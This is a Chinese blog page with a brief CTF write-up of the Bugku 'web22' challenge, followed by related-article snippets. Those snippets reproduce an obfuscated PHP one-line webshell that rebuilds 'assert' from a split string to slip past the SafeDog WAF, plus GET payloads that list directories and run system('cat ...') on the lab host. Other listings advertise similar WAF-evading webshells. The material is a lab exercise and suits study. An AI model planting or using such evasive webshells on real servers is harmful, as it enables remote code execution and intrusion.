【bugku_writeup】web22 过狗一句话

最新推荐文章于 2021-05-31 10:11:39 发布
最新推荐文章于 2021-05-31 10:11:39 发布
阅读量211 收藏 1
点赞数 1
分类专栏: ctf_bugku_writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kongzhian/article/details/112003555
版权

根据提示,这是一个一句话木马

构造payload

用蚁剑操作一下,发现没有用,会报错,这个时候考虑手动爆破

先了解几个函数

print_r()  把数组的键和值均打印出来

scandir() 扫描目录下的目录和文件,并返回数组

__FILE__ :当前目录

得到当前路径

直接访问txt文件

get it!

kzaaa
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
最新过安全狗一句话
10-14
最新过安全狗一句话
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
bugkuweb22过狗一句话
EC_Carrot的博客
12-23 243
给坑了一会,这过狗一句话可以 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 进去后一片空白,什么提示都没有,就那工具去扫,也没扫出来,后来看看wp发现,这个过狗一句话居然是提示,get传入s就能执行命令,绝了! ?s=print_r(scandir('./')) 直接看到目录下有个fl.
bugku-web22
baidu_39504221的博客
12-21 544
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) explode("#",$poc); 将$poc以#为分界符号分为数组 $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5].
Bugku CTF web22Web
ChaoYue_miku的博客
03-05 475
0、打开网页,查看题目描述 送给大家一个过狗一句话: $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 这句话有什么含义呢,实际上就是代码审计 我们发现GET方法接受了一个变量s,而且也没有什么过滤,因此考虑直接读取文件目录 1、构造并上传payload:http://114.67.2
过狗一句话 -Bugku
j7ur8
06-21 1117
搜索到的几种解法:    1. s=print_r(scandir('./')) 然后读取flag.txt    2. s=print_r(glob("*.*")) 然后读取show_source(flag.txt)    3. 使用flag_get_contents(flag.txt)读取文件    eg: 还有system('ls')的读取方法但是这里应该没有权限....
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
在本文,我们将深入探讨如何从部分私钥解密RSA加密的数据,这是一次对技术挑战的独特尝试,通常称为“ReverseRSA”。RSA是一种广泛使用的公钥加密算法,由Ron Rivest、Adi Shamir和Leonard Adleman在1977年提出...
PracticalML_writeup
06-28
《实用ML_writeup》是关于机器学习(Machine Learning, ML)实践的一份详细总结,主要以R语言为工具进行讲解。R语言是一种广泛应用于统计分析、数据可视化和机器学习的编程语言,它拥有丰富的库和工具,使得数据分析...
2015_ransomware_writeup
06-23
周末勒索软件分析上周,我妻子的一位同事设法捕获了一个垃圾勒索软件; 我相信她是从一封与此类似的电子邮件得到的: 我们公司的快递员无法派送包裹。 REASON: Postal code contains an error.DELIVERY STATUS: ...
Coursera-Prediction_Assignment_Writeup-1
02-24
Prediction_Assignment_Writeup 同行评分作业:预测作业撰写 ##指示 人们经常的一件事是量化他们从事某项特定活动的数量,但是他们很少量化他们某件事的程度。 在此项目,您的目标是使用来自6位参与者的...
2015年最新的过狗一句话大马
12-26
2015年最新的过狗一句话大马
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
送给大家一个过狗一句话
qq_48511129的博客
01-26 396
送给大家一个过狗一句话 $poc=“a#s#s#e#r#t”; KaTeX parse error: Expected 'EOF', got '#' at position 16: poc_1=explode("#̲",poc); poc2=poc_2=poc2​=poc_1[0].poc1[1].poc_1[1].poc1​[1].poc_1[2].poc1[3].poc_1[3].poc1​[3].poc_1[4].$poc_1[5]; poc2(poc_2(poc2​(_GET[‘s’]) 分析代码构
Bugku web22 过狗一句话
weixin_44522540的博客
02-23 185
十八、web22 过狗一句话 本题:php scandir()函数、assert代码执行漏洞 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); //explode("#",$poc);将$poc以#为分界符号分为数组 $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; // 这句就相当于$poc_2=assert $poc_2($
过狗一句话
小白的劝退之路
05-25 251
exlpde()分割a#s#s#e#r#t为assert,使用assert()函数的解析传进来的s串,assert有代码执行漏洞。 ?s=print_r(scandir('./')) 扫描当前目录,并按数组输出。
bugku过狗一句话
wssmiss的博客
04-16 348
题目 php代码 explode(a,b,c):把字符串打散为数组,a为分隔符且不为空,b为待打散的字符,c规定所返回的数组元素的数目 0代表返回博阿寒一个元素的数组,大于0返回包含最多c个元素的数组。小于0,返回包含除最后的limit个元素意外的所有元素的数组 代码poc_1是一个数组有a,s,s,e,r,t五个元素 poc_2是assert函数 对传入的s进行操作 注:函数assert是检...
BugKu-web篇-web22
jiuyongpinyin的博客
05-31 112
web22 看了提示就知道需要以GET方式传入s参数,然后就试了一下system()看看能不能直接执行系统命令,发现可以,那这道题目就变得简单起来了,先查看当前目录下的文件 然后直接cat 这个文档 得到flag payload如下: http://114.67.246.176:11188?s=system('cat flaga15808abee46a1d5.txt') 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
bugku 过狗一句话
Superpig的博客
11-12 732
分析 根据提示,分析得关键在于assert(),查资料得assert()用于调试,跟eval()差不多,但是eval()只能执行符合php编码规范的$code_str 解题 构造payload http://123.206.87.240:8010/?s=print_r(scandir(’./’)); 得到目录结构 再访问http://123.206.87.240:8010/fl4g.txt 即...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值